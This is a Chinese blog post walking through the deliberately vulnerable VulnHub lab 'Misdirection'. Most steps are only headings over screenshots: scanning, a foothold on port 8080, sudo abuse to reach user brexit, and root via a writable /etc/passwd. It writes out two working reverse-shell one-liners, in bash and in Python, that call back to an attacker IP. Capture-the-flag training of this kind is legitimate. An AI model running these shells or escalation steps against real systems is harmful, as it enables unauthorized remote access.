Misdirection(VulnHub)

最新推荐文章于 2024-07-23 17:12:02 发布
最新推荐文章于 2024-07-23 17:12:02 发布
阅读量347 收藏 8
点赞数 5
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65144653/article/details/136226882
版权
本文探讨了使用Nmap进行端口扫描,包括针对80和8080的渗透尝试,如利用searchsploit和执行反弹shell命令。还涉及sudo权限提升(sudo-l)以及通过brexit用户渗透获取敏感文件并利用psswd提权的过程。
摘要由CSDN通过智能技术生成

Misdirection

nmap扫描

image-20240203164134251

image-20240203164754661

image-20240203172258318

image-20240203173521959

image-20240203173548744

image-20240203164806659

目录爆破

image-20240203220722752

image-20240203220905136

80小探索

image-20240203221120213

searchsploit

image-20240203170135683

无果

8080端口渗透

image-20240203221043014

反弹shell

bash -i >& /dev/tcp/192.168.2.228/11111 0>&1

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.228",11111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image-20240203221740291

image-20240203221811876

sudo -l

image-20240203223958515

设变量清屏

image-20240203224521967

brexit用户渗透

image-20240203224711794

image-20240203224845835

查看敏感文件

image-20240203225551515

通过psswd提权

image-20240203232318991

image-20240203232402521

image-20240203232423553

沫风港
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Misdirection 1--VulnHub系列学习记录
weixin_45509443的博客
07-25 301
了解openssl工具 通过 /etc/passwd 提权 了解Metasploit的 Web Delivery Scrip 反弹shell 了解收集非常见反弹shell命令方式
vulnhub 6
willow_liang的博客
02-05 174
web-developer-1,288 1.端口扫描 2.NC远程登录JAMES-Admin 3.nc远程登录Pop3,查看邮件信息 mindy用户下有ssh登录信息 4.登录ssh,发现mindy是个受限制的shell v ssh 192.168.0.109 -l mindy "export TERM=xterm; python -c 'import pty; pty.spawn(\"/bin/sh\")'" 5.提权 echo 'import os;.
Vulnhub-靶机-Misdirection 1
qq_43264813的博客
01-27 596
Vulnhub—靶机—Misdirection 1 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/symfonos-52,415/ 文章目录Vulnhub—靶机—Misdirection 1一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.110.0/24 【步骤二】对目标靶机进行全
Vulnhub:Misdirection 1靶机
qq_43884092的博客
04-17 154
8080端口/debug目录,是一个可以执行命令的shell,bash和写入用户提权
vulnhub靶机Misdirection
0of_blog
05-01 758
x 是密码占位符,表示密码已加密并存储在 /etc/shadow 文件中;UID 是新用户的 UID,可以选择一个未被占用的数字(建议从 1000 开始);/home/username 是用户的家目录;/bin/bash 是用户的默认 shell。www-data用户允许在localhost上以brexit用户身份执行/bin/bash命令,因此我们可以利用这个漏洞来提权为brexit用户。注意到viminfo中有对/etc/passwd的操作,查看权限。是个仿真终端,查看了一下基本信息,只有低权限身份。
Vulnhub靶机:MISDIRECTION_ 1
LainWith的博客
01-06 975
系列:Misdirection(此系列共1台) 发布日期:2019 年 9 月 24 日 难度:初级 运行环境:官方推荐Virtualbox,我使用的是VMware 补充:靶机容易被干崩,下手轻点 目标:取得 root 权限 学习:靶机地址:https://www.vulnhub.com/entry/misdirection-1,371/netdiscover主机发现 主机信息探测 nmap发现了一些有趣的目录,疑似发现了sql注入,经核实为误报 80端口常规探测没有发现什么有趣的信息,但是nmap发现了8
红队打靶:Misdirection打靶思路详解(vulnhub
Bossfrank的博客
10-23 688
本文是vulnhub靶机Misdirection的详细打靶过程。靶机不难,关键点在于找到合适的突破口,不要在看似繁多的攻击面中徘徊。本文涉及到的知识点包括:信息收集的技巧、常见反弹shell语句、sudo bash提权、viminfo敏感信息、/etc/passwd可写提权等。
[VulnHub靶机渗透] Misdirection: 1
人若无名,便可专心练剑
02-10 914
靶机精讲之Misdirectionvulnhub靶机,不难,但开始阶段很容易被误导,渗透目标选择的优先级容易选错以致费时,死磕一点还是快速跳跃,需要权衡、经验和智慧。用webshell获得系统立足点,两次提权获得root权限。这台机器很标准,其中多了一点点曲折和趣味,是高仿真场景的抽象,规模不大,但渗透体验很棒,细节满满。
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3064
每台都做一做,然后记录在博客里.供自己和大家一起学习.
网络协议-SOTP 协议格式
ziyunLLL的博客
07-19 438
SOTP(Secure Overlay Transport Protocol)是一种安全的覆盖层传输协议,旨在提供增强的安全性和功能。2.密钥管理:密钥的管理和交换是协议安全的重要部分,通常使用公钥基础设施(PKI)或密钥交换协议(如 Diffie-Hellman)。1.安全性:确保加密算法和认证算法的安全性。常用的加密算法包括 AES,常用的认证算法包括 HMAC-SHA256。3.性能:加密和认证会增加计算开销,需要在安全性和性能之间找到平衡。SOTP 协议格式的一般结构。
【Socket 编程】基于UDP协议建立多人聊天室
稻草人敲代码的博客
07-19 421
对于服务端来说,除了要接收消息之外,还要实现一个路由转发模块,该路由转发模块可以将相应发送给所有连接的客户端。而对于客户端来说,除了要发送消息给聊天室,还要能实时看到其它所有客户端的消息。下面来看看具体实现的代码,代码只给出核心模块,其余代码模块代码可以借鉴我之前的博客。具体来说,服务器类实现的功能只有收消息。
docker build时的网络问题
flynetcn的专栏
07-19 366
docker build网络问题
【ROS2】演示:为有损网络使用服务质量设置
cxyhjl的博客
07-22 547
目录背景先决条件运行演示命令行选项添加网络流量背景请阅读有关 QoS 设置的文档页面,以获取有关 ROS 2 中可用支持的背景信息。在这个演示中,我们将生成一个发布相机图像的节点和另一个订阅图像并在屏幕上显示图像的节点。然后,我们将模拟它们之间的丢包网络连接,并展示不同的服务质量设置如何处理不良链接。先决条件本教程假设您已安装并运行 ROS 2 和 OpenCV。有关安装说明,请...
安徽京准:NTP网络时间服务器的几种应用场景
NTP授时服务器
07-19 223
安徽京准:NTP网络时间服务器的几种应用场景
网络编程套接字socket
安权_code的博客
07-23 514
网络编程中的套接字(socket)是实现网络通信的关键,换句话来说,套接字像两个端点,而发送方与接收方就是通过这两个端点进行通信的,socket的意思是插座,表示插头和插座连接上后,即发送方和接收方连接上了,然后把电流通过插座流向插头对标发送方与接收方建立了链接。
H3C与VPN高级应用(七)深入探讨H3C防火墙与VPN高级应用
洛秋的博客
07-23 676
IPSec(Internet Protocol Security)是一种用于保护IP通信的协议,通过对数据包进行加密和认证来确保数据的机密性、完整性和真实性。IPSec VPN通常用于建立安全的远程连接,保护企业内部网络与远程办公或分支机构之间的数据通信。NAT(Network Address Translation)是一种将私有IP地址转换为公共IP地址的技术,通常用于多个设备共享一个公共IP地址访问互联网。NAT有助于节约公共IP地址,同时增强内部网络的安全性。
DNS域名管理系统、搭建DNS服务
最新发布
十四的博客
07-23 549
DNS概述。
如何保护你的网络安全?
m0_70655343的博客
07-15 923
这项服务可以抵御复杂的网络威胁,即使在最强烈的攻击下也能保证您的网站服务如常,用户几乎无感知。此外,DDoS高防服务还具备网络应用程序防火墙(WAF),采用实时监控和机器学习来保护用户的资料,防止用户资料被盗,保护服务免遭未经授权的访问,降低个人数据泄露的风险,进而防止数字资产流失。为什么它这么重要呢?打个比方,这就像是你家车库的门开关出了问题,每次你按下按钮,车库门就不停地开关,直到电池耗尽。想象一下,你家的路由器被人利用来发起攻击,就像是你家的水龙头被打开,水不停地流向别人的房子,淹没了他们的院子。
mockito覆盖率
09-03
- *1* *2* [如何使用 Mockito 和 Espresso 提高 Android 应用程序的测试覆盖率](https://blog.csdn.net/Misdirection_XG/article/details/126086134)[target="_blank" data-report-click={"spm":"1018.2226.3001....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值